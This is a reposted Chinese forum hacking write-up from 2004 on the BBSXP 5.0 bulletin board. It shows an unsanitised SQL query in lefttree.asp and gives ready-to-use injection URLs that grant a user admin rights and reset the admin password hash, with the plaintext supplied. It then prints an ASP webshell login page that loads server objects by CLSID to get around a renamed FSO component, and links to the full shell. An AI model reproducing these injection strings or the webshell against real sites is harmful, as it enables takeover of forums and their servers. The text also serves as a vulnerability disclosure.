发新话题
打印

[转载]移型换位之BBSXP5.0

[转载]移型换位之BBSXP5.0

信息来源:情感联盟
文章作者:xiaolu & 13K

===========================[ 移型换位 之 BBSXP5.0 ]==================
漏洞发现者: xiaolu(web@666w.cn) 13K(13_k@163.com)
所影响版本: BBSXP5.0 SQL/ACCESS
日期:2004.5.1 WWW.666W.COM WWW.SHJSAFE.COM
==============[ 1. 前言 ]============================================

-_-"" 今天是5·1劳动节,好无聊吖..先祝大家大家劳动节快乐.....

太无聊了..在朋友一个论坛上灌水,朋友让我检测他论坛的安全.....

好吧,看了一下,是BBSXP5.0的.就去下载个来看看....

======================================[ 1. 内容 ]====================

看代码中..........

(没想到,有个这么**的问题,程序员们该反省反省了,写此篇文章,没什么技术可言,只是想提醒一下程序员们,不要太懒了
复制内容到剪贴板
代码:
lefttree.asp
<!-- #include file="setup.asp" -->
<%

if Request("menu")="menu" then

sql="Select * From menu where followid="&Request("id")&" order by SortNum"
Set Rs1=Conn.Execute(sql)
do while not rs1.eof
嘿嘿.看到了没? 是多么多么的无聊.........

=======================[ 1. 利用 ]===================================

OK.Let&#39;s go..
复制内容到剪贴板
代码:
http://www.host.com/LeftTree.asp?menu=menu&id=1;update [user] set membercode=5 where username=&#39;fuck&#39;--
[url]http://www.host.net/LeftTree.asp?menu=menu&id=1;update[/url] clubconfig set adminpassword=&#39;A64D84237507262182B4B902A5EDC35B&#39;--
OK.
user:fuck
pass:xiaoxue

"A64D84237507262182B4B902A5EDC35B"是32位的MD5加密.

进入后台..嘿嘿.搞个webshell吖..恩.传上去....吖!!!!! FSO被改名字了..555555

不好玩了..得想个办法解决它....OK.有了!

用object,挖哈哈.....搞定,搞定........

试了一下,他们没改clsid.只要clsid没改就能运行...代码如下:
复制内容到剪贴板
代码:
<%@ LANGUAGE = VBscript.Encode codepage ="936" %>
<%Server.scriptTimeOut=5000%>
<object runat=server id=oscript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oscriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
&#39;on error resume next
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("script_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="fuckfuck" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>

<body>
<%if request.form("password")<>"" then
response.write "Password Error!"
end if
%>

<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"
bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">
<tr>
<td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
<div align="center"><center><p>Enter Password:<input type="password" name="password"
size="20"
style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset">
<input type="submit" value="OK!LOGIN" name="B1"
style="font-size: 9pt; border: thin outset"></p>
</center></div>
</form>
</td>
</tr>
</table>
</body>
</html>
<%end if%>
省略了......

完整的代码下载地址为:
http://soft.666w.com/tools/gif.rar

呵....解决问题,可以继续延伸了.......

=======================[ 1. 结束 ]===================================

可以利用这些拿到更高的权限,嘿嘿.. ACCESS版的,只可以拿到MD5加密后的Password..
OK...完事了..继续无聊去....路子,我们走,咱哥俩喝酒解闷去......GO GO GO
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

发新话题